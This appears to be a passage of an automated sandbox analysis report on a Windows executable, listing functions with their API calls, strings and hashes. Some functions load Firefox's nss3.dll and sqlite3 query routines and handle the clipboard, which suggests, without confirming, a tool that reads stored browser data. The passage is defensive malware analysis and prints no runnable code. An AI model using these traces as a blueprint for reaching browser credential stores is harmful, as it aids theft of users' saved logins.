Yara matches

Similarity

API ID: malloc
String ID: failed to allocate %u bytes of memory
API String ID: 2803490479-1168259600
Opcode ID: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
Instruction ID: cc16955a0d14ca8776a7aa5b229d79c98c920de21d1adc6b7d8c4ece6c284845
Opcode Fuzzy Hash: 37a0e16a31e73fb3f1329956b653d3eb145f9cbc4939c84207ade25bbdcda1f4
Instruction Fuzzy Hash: 64E020B7F0361267C2004615DC0168777959FD132171B0637F95CD3680D63CD84587A9

Uniqueness

Uniqueness Score: -1.00%

Function 00416ED2, Relevance: 3.0, APIs: 2, Instructions: 24sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 00416EEB
FindCloseChangeNotification.KERNELBASE(0CC483FF,00000000,00000000,004536AC,0041753F,00000008,00000000,00000000,?,004176FC,?,00000000), ref: 00416EF4

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseFindNotificationSleep
String ID:
API String ID: 1821831730-0
Opcode ID: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
Instruction ID: ddbdeb719d62bbcd0ae2c24f8bc232808eb7cee6ac061654c4d164212cdc0068
Opcode Fuzzy Hash: cc2e2d56278e834b5826f7bb8f80f5f4d654d385e6d95c8a2fc1f4074e09f098
Instruction Fuzzy Hash: 35E0C23F11071A9FDB0097BCDC90AD773D8EF56338726433AF662C61A0CA65D8828654

Uniqueness

Uniqueness Score: -1.00%

Function 0041B556, Relevance: 2.7, APIs: 2, Instructions: 195COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041B6FA
memcmp.MSVCRT ref: 0041B70C

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memcmpmemset
String ID:
API String ID: 1065087418-0
Opcode ID: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
Instruction ID: 1efd5175aaeb232b83b4fa12f0066e98a2b2c589ef3b7fe000d2c80dadf29316
Opcode Fuzzy Hash: 9b44e04d39c850c09dfc470b21759ac07039072516198818df3f324f61dd621a
Instruction Fuzzy Hash: AF617C71A01245EFDB10EFA485C06EEB7B4FB54308F14846FE11497281E738AED59B9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041857E, Relevance: 2.6, APIs: 2, Instructions: 132COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00418670
memset.MSVCRT ref: 00418687

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 1d4e29f100636c82fc329f94a374f4d18a69853f661fcb673019947e7cc7e1db
Instruction ID: 158bf94f573ecacca79ccaf447c09fb498ee4e42fef6769a8b2fd70c0d8b82a4
Opcode Fuzzy Hash: 1d4e29f100636c82fc329f94a374f4d18a69853f661fcb673019947e7cc7e1db
Instruction Fuzzy Hash: 0D417A72500602EFCB309F64D9848ABB7F6FB14314710492FE54AC7660EB38E9D5CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004109C4, Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00410A52: memset.MSVCRT ref: 00410A9A
Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB1
Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410AB9
Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B14
Part of subcall function 00410A52: wcslen.MSVCRT ref: 00410B22

Part of subcall function 004086BA: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,00410A06,00000000,?,00000000,?,00000000), ref: 004086D2
Part of subcall function 004086BA: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 004086E6
Part of subcall function 004086BA: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00411ED6), ref: 004086EF

CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 00410A10

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: wcslen$File$Time$CloseCompareCreateHandlememset
String ID:
API String ID: 4204647287-0
Opcode ID: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
Instruction ID: e327927a43c347593f183825775ae13c5bf460ea87da421573a566f28fb83fb7
Opcode Fuzzy Hash: 48bb59a4ca4dbe6461cecc32442f889d9791df2e0bee5e493ae7e30c1f2a8d06
Instruction Fuzzy Hash: 7A117076C00218EBCF11EBA5DA419DEB7B9EF44300F10006BE441F3281EA749B84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00413E1E, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntW.KERNEL32 ref: 00413E45

Part of subcall function 00413CAE: memset.MSVCRT ref: 00413CCD
Part of subcall function 00413CAE: _itow.MSVCRT ref: 00413CE4
Part of subcall function 00413CAE: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00413CF3

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: PrivateProfile$StringWrite_itowmemset
String ID:
API String ID: 4232544981-0
Opcode ID: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
Instruction ID: 5d66eace87880ca3e294b7f0e570a8e3be22b6ae62b10c3d44e19be24f2def2d
Opcode Fuzzy Hash: 1f1dca71c13544e9ae3cf3bf1a8489d4a1747e82e79b44c055a72dbc52dfabd8
Instruction Fuzzy Hash: 89E0B632000249ABDF126F91EC01AAA7F66FF14315F148459FD6C14121D33295B0AF84

Uniqueness

Uniqueness Score: -1.00%

Function 00444425, Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,00411BC7,?,?,00403557,?), ref: 00444436

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
Instruction ID: 39ddfc5443798b4b2f471bdaff8db486b4a9363c7739a8bb917076c50ef601e7
Opcode Fuzzy Hash: 323128d68ef13db0835413ed71cea84c0f3745e98266a12d00a9647ca1b2ecc2
Instruction Fuzzy Hash: 92E0F6B5900B008F97308F2BE944506FBF8BEE46103108A1F91AAC2A21C3B4A5498F94

Uniqueness

Uniqueness Score: -1.00%

Function 004135FF, Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

Part of subcall function 00413627: LoadLibraryW.KERNELBASE(psapi.dll,00000000,00413607,00000000,004134F7,00000000,?), ref: 00413632
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 00413646
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00413652
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041365E
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0041366A
Part of subcall function 00413627: GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413676

K32GetModuleFileNameExW.KERNEL32(00000104,00000000,004134F7,00000104,004134F7,00000000,?), ref: 0041361E

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$FileLibraryLoadModuleName
String ID:
API String ID: 3821362017-0
Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction ID: 7bbd5afd8370dadb00360ee8d7667c1b04e34d2617d736b2e99a938255987c13
Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
Instruction Fuzzy Hash: 7CD022312043007BD231EE708C00FCBB3E8BF44711F028C1AB190E2280C3B8C9409308

Uniqueness

Uniqueness Score: -1.00%

Function 00413401, Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(00000000,00406DBF,?,00000000,?,?,?,?,?,00000000,?), ref: 00413408

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
Instruction ID: 53121aa1ed69e67302caa1b874726051d72530908054280e128cb363a29a4499
Opcode Fuzzy Hash: c7bdee4124c4d8ad6a19752b3b65f2382f4191ba04176db7896d06b676d0d792
Instruction Fuzzy Hash: 51D0C9324005229BDB00AF26EC45B857368EF00351B150025E800BB492D738BEA28ADC

Uniqueness

Uniqueness Score: -1.00%

Function 0040899C, Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0040DDA6,00000000,0044AF64,00000002,?,0040FF40,00000000,00000000,?), ref: 004089B3

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
Instruction ID: 44b36b217b32540387e14a2368d622af177610148a3238ec1afc6282a592e5c5
Opcode Fuzzy Hash: d35f175962138f83e7c21fa835ff5d24f1ea1e816d258fa8209e89adc734a4dd
Instruction Fuzzy Hash: 64D0C93551020DFFDF01CF80DD06FDE7B7DEB04359F104054BA0495060C7B59A10AB54

Uniqueness

Uniqueness Score: -1.00%

Function 00407D7B, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
Instruction ID: 729bcb02508df23f9412a42fb8e8b3188fed1bd1f0cd2b7b0f8edc4fa6246a8f
Opcode Fuzzy Hash: 8208bc6edc164ae96c82fd775a2941fa10469c8b98cafac607abb3fbe20ee729
Instruction Fuzzy Hash: E3C092B4240201BEFF228B10ED15F36295CD740700F2044247E00E80E0D1A04E108924

Uniqueness

Uniqueness Score: -1.00%

Function 00407D94, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040DD67,00000000,?,0040FF40,00000000,00000000,?,00000000,00000000), ref: 00407DA6

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
Instruction ID: edb615435fe3ce855b8554d9524e6f242ae4b45eb81851bd3d2393cb7dc29c83
Opcode Fuzzy Hash: e4fb0def6ce664a06b79152cf56c2ddeab2622e766aaf14104048769dc5d2c9c
Instruction Fuzzy Hash: 67C012F43503017FFF208B10AD0AF37395DD780700F1084207F00E80E1D2E14C008924

Uniqueness

Uniqueness Score: -1.00%

Function 00409552, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 00409559

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
Instruction ID: 664dc763c5da3aaab367392b47211da9bee634dc4adcd4213ebe75a48c3d30fa
Opcode Fuzzy Hash: f17d17a82e7eff4c361624d86b7f249207a7f80e03ad9ec9b6aa2e80ce8aa672
Instruction Fuzzy Hash: 6EC09BB29127015BF7309F66C40471373D85F50767F314C5DA4D1964C1DB7CD5408514

Uniqueness

Uniqueness Score: -1.00%

Function 00414266, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesW.KERNELBASE(?,?,004141E0,00000000), ref: 00414275

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
Instruction ID: 894f21907dab3ca3b917dc931ff3d8bd940b81db11264512214ff9c0d0df685d
Opcode Fuzzy Hash: 10e677fbce6fd90f0b0892a272ce9856b781f2edb2e34da2307d6f8996e91fc3
Instruction Fuzzy Hash: 23C09B35654341A7C7029F109C0DF1E7EA5BB95705F504C29B151940A0C75251549609

Uniqueness

Uniqueness Score: -1.00%

Function 00409428, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(?,0040933E,?,00000000,?,004127ED,*.*,?), ref: 00409432

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
Instruction ID: 3bd61d94ea2d0ebbf22c21a92135ad1df5e9ea430364887b997a0a3dbe6c7a02
Opcode Fuzzy Hash: 0ad1f9dc815212ba49355cece8123c874f6c433bcb3a33917fc8ecdda60dda50
Instruction Fuzzy Hash: 3EC048345109018BD6289F38986A52A77A0AA5A3303A44F6CA0F2920E2E73888428A04

Uniqueness

Uniqueness Score: -1.00%

Function 00413ACB, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,0040ADDC), ref: 00413AD7

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
Instruction ID: 95e4874612f61a4c2f5820174f699a9a2e50adc9900ffd5901b80c85968e45e3
Opcode Fuzzy Hash: ae408aea655b612f84878290bbe666c5974634203696d3986710f65fc614f927
Instruction Fuzzy Hash: 7BC04C35510B118BEF218B12C989793B3E4AF00757F40C818949685851D77CE454CE18

Uniqueness

Uniqueness Score: -1.00%

Function 00408250, Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,0040BC93,?,0040BD4A,00000000,?,00000000,00000208,?), ref: 00408254

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
Instruction ID: 7aa4b53cbdd50d27f0544b0d73f3b09e9b9e978b4a3a64aa4ec168f40bbc8e5c
Opcode Fuzzy Hash: 4382bcffcdb6742439dfbf3a6db9824b907b5495e43b5b320ff748ce3f5f7401
Instruction Fuzzy Hash: 89B012B92104005BCF0807349C4904D36505F456317300B3CB033C01F0D730CCA0BA00

Uniqueness

Uniqueness Score: -1.00%

Function 00413E4F, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004145EB,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00413E62

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
Instruction ID: 06f107d5783c69a41ddb44c60f44fa238db6365feab173ebf779541cd7ebc08f
Opcode Fuzzy Hash: beaa972787324bac86b0054d7d1e8ed04957e390a170dd16c4c1fd7d277969b5
Instruction Fuzzy Hash: E1C09B39544301BFDF114F40FE05F09BB61AB84F05F004414B344240B282714414EB57

Uniqueness

Uniqueness Score: -1.00%

Function 0041B76D, Relevance: 1.3, APIs: 1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f77371c8789c3266b9f1932ef178477fe063e167a465118b7ddcb6402bacfed
Instruction ID: fa567e0f167378dcabf243c4c44df542d601d1aca3ea04bf4c0b19c361688719
Opcode Fuzzy Hash: 6f77371c8789c3266b9f1932ef178477fe063e167a465118b7ddcb6402bacfed
Instruction Fuzzy Hash: 1A317C31901216EFDF14AF25D9817DA73A4FF00B55F14412BF825AB280DB38EDA08BD9

Uniqueness

Uniqueness Score: -1.00%

Function 00418A75, Relevance: 1.3, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00418ABB

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 699d931d5904c81c8ecf6c74ae7279b432135137ffc4fc0b9ee73e3934815af2
Instruction ID: e8b0848d424c06527b7c98d9968769e486fd61e3c9cab8ecaf7e7731b424246b
Opcode Fuzzy Hash: 699d931d5904c81c8ecf6c74ae7279b432135137ffc4fc0b9ee73e3934815af2
Instruction Fuzzy Hash: 03215CB1A00604AFDB10DF69C981A9AB7F5FF89304F24466EE44ACB351DB75ED818A08

Uniqueness

Uniqueness Score: -1.00%

Function 00409539, Relevance: 1.3, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559

??2@YAPAXI@Z.MSVCRT ref: 00409542

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ??2@??3@
String ID:
API String ID: 1936579350-0
Opcode ID: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
Instruction ID: 8918756149df837d9eea435be632a3e0a17df07a668273fb2c59ff5331204d46
Opcode Fuzzy Hash: afed82952d0e9bcea28b6882f33bad89db067c3a9bda0bf3c4f02441038791aa
Instruction Fuzzy Hash: 2BC08C724182100AD650FF79280205622D49E82320301882FE091E3142D53848014344

Uniqueness

Uniqueness Score: -1.00%

Function 0040B1BF, Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,00410160,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,004448C6,00000000,?,0000000A), ref: 0040B1C6

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
Instruction ID: def78aeb235da03500d5bf48ca01037dd20a397eb60980b6de46ef9d9da7be76
Opcode Fuzzy Hash: ca48b363025fd7f42afa8552a353c3ae8abba493304229bf9adae34e8f70245b
Instruction Fuzzy Hash: ACC01272420B018FF7209E11C406722B3E4EF0077BF618C0D909481482C77CD4408A48

Uniqueness

Uniqueness Score: -1.00%

Function 00408F1E, Relevance: 1.3, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

free.MSVCRT(00000000,004092A3,00000000,?,00000000), ref: 00408F25

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
Instruction ID: eebb639015016b4d35185c1cf15d7584ef51e0a9315dec3cbabf5363aa789e86
Opcode Fuzzy Hash: 3eb1e8d1b89ea51a5407810e4ab9f4a69700e84ea5e736543a1eb2ef7f6bf350
Instruction Fuzzy Hash: C5C0127A4107028BF7308F21C509322B2E5AF0072BF708C0D90D081482CB7CD0808A08

Uniqueness

Uniqueness Score: -1.00%

Function 00414C5E, Relevance: 1.3, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00414C62

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
Instruction ID: c34dd2395d73de7fd8324248a47ac8fcc6ed20e97332430ae650d69d176587ff
Opcode Fuzzy Hash: e750de9405b69b73a16e34a7c973d61e0a85f8dff2a96d7ff9c71a90812ce4fe
Instruction Fuzzy Hash: C8900286455511116C0425756C0760911480892176335074A7032959D1CE1C8150601C

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00443A61, Relevance: 66.7, APIs: 23, Strings: 15, Instructions: 152libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00443A8C
wcscpy.MSVCRT ref: 00443AA3
memset.MSVCRT ref: 00443AD6
wcscpy.MSVCRT ref: 00443AEC
wcscat.MSVCRT ref: 00443AFD
wcscpy.MSVCRT ref: 00443B23
wcscat.MSVCRT ref: 00443B34
wcscpy.MSVCRT ref: 00443B5B
wcscat.MSVCRT ref: 00443B6C
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B7B
LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00443B92
LoadLibraryW.KERNEL32(sqlite3.dll,?,00000000,00000000), ref: 00443BA5
LoadLibraryW.KERNEL32(mozsqlite3.dll,?,00000000,00000000), ref: 00443BB3
LoadLibraryW.KERNEL32(nss3.dll,?,00000000,00000000), ref: 00443BC3
GetProcAddress.KERNEL32(?,sqlite3_open), ref: 00443BDF
GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 00443BEB
GetProcAddress.KERNEL32(?,sqlite3_step), ref: 00443BF8
GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 00443C05
GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 00443C12
GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 00443C1F
GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 00443C2C
GetProcAddress.KERNEL32(?,sqlite3_close), ref: 00443C39
GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 00443C46

Strings

\sqlite3.dll, xrefs: 00443AF7
sqlite3.dll, xrefs: 00443BA0
sqlite3_column_int64, xrefs: 00443C14
sqlite3_close, xrefs: 00443C2E
sqlite3_exec, xrefs: 00443C3B
sqlite3_open, xrefs: 00443BD9
sqlite3_column_text, xrefs: 00443BFA
nss3.dll, xrefs: 00443BBE
sqlite3_column_int, xrefs: 00443C07
sqlite3_finalize, xrefs: 00443C21
\nss3.dll, xrefs: 00443B66
sqlite3_step, xrefs: 00443BED
sqlite3_prepare, xrefs: 00443BE1
\mozsqlite3.dll, xrefs: 00443B2E
mozsqlite3.dll, xrefs: 00443BAE

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$LibraryLoadwcscpy$wcscat$memset$HandleModule
String ID: \mozsqlite3.dll$\nss3.dll$\sqlite3.dll$mozsqlite3.dll$nss3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
API String ID: 2522319644-522817110
Opcode ID: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
Instruction ID: 5ad66febf3ba3de4182efca1dfca8304e8a02b444a88a93b5109a45c6fbe2280
Opcode Fuzzy Hash: 7f353f14b8243b6bfeb803f42ecde1dc337dcabdc0f1235d43c8e9788d600036
Instruction Fuzzy Hash: 0E5153B1940719AAEB20FFA28D49F47B6E8AF58B04F1109ABE549D2141E77CE644CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00417BE9, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00417BF2

Part of subcall function 00416CB6: GetVersionExW.KERNEL32(?), ref: 00416CD9

FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C19
FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00417C42
LocalFree.KERNEL32(?), ref: 00417C5D
free.MSVCRT(?,0044C838,?), ref: 00417C8B

Part of subcall function 00416D4F: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74785970,?,00416E7A,?), ref: 00416D6D
Part of subcall function 00416D4F: malloc.MSVCRT ref: 00416D74

Strings

OsError 0x%x (%u), xrefs: 00417C6F

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
String ID: OsError 0x%x (%u)
API String ID: 2360000266-2664311388
Opcode ID: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
Instruction ID: 86e7f975cda22aef79341c94f36a987d619a37d11feed098ff88b3a8796ba2f5
Opcode Fuzzy Hash: 8bfb20d829e2964922284bcc965883c1a7f62db9999a68da7033c4551d0de9ee
Instruction Fuzzy Hash: BA11B234E01228BBDB11ABA2DD8DCDF7F78EF85750B20005BF40592211E7784A80DBE8

Uniqueness

Uniqueness Score: -1.00%

Function 00408CAC, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 37fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,nss3.dll,00000000), ref: 00408CC4
FindNextFileW.KERNEL32(00000000,?), ref: 00408CE3
FindClose.KERNEL32(00000000), ref: 00408D03

Strings

., xrefs: 00408CD1
nss3.dll, xrefs: 00408CB6
1k@, xrefs: 00408CEF

Memory Dump Source

Source File: 00000002.00000002.370197886.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Find$File$CloseFirstNext
String ID: .$1k@$nss3.dll
API String ID: 3541575487-3908353483
Opcode ID: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
Instruction ID: f3d79de5d6fec64b9baa04ebfd9a669330ca9081903d010b6bc69252f5057639
Opcode Fuzzy Hash: 44fa9e536a02e76a834846768dd1f10842e2d891e0e560e34b8b660adb550914
Instruction Fuzzy Hash: 6CF0BB759005246BDF205B64EC4C6ABB7BCFF45365F000176ED06A71C1D7749D458A98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F078, Relevance: 4.5, APIs: 3, Instructions: 44fileclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 004080FD: GetTempPathW.KERNEL32(00000104,?,?), ref: 00408114
Part of subcall function 004080FD: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00408126
Part of subcall function 004080FD: GetTempFileNameW.KERNEL32(?,004029F6,00000000,?), ref: 0040813D

OpenClipboard.USER32(?), ref: 0040F0B6
GetLastError.KERNEL32 ref: 0040F0CB
DeleteFileW.KERNEL32(?), ref: 0040F0EA

Part of subcall function 00407F9A: EmptyClipboard.USER32 ref: 00407FA4
Part of subcall function 00407F9A: GetFileSize.KERNEL32(00000000,00000000), ref: 00407FC1
Part of subcall function 00407F9A: GlobalAlloc.KERNEL32(00002000,00000002), ref: 00407FD2
Part of subcall function 00407F9A: GlobalLock.KERNEL32 ref: 00407FDF
Part of subcall function 00407F9A: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00407FF2
Part of subcall function 00407F9A: GlobalUnlock.KERNEL32(00000000), ref: 00408004
Part of subcall function 00407F9A: SetClipboardData.USER32 ref: 0040800D
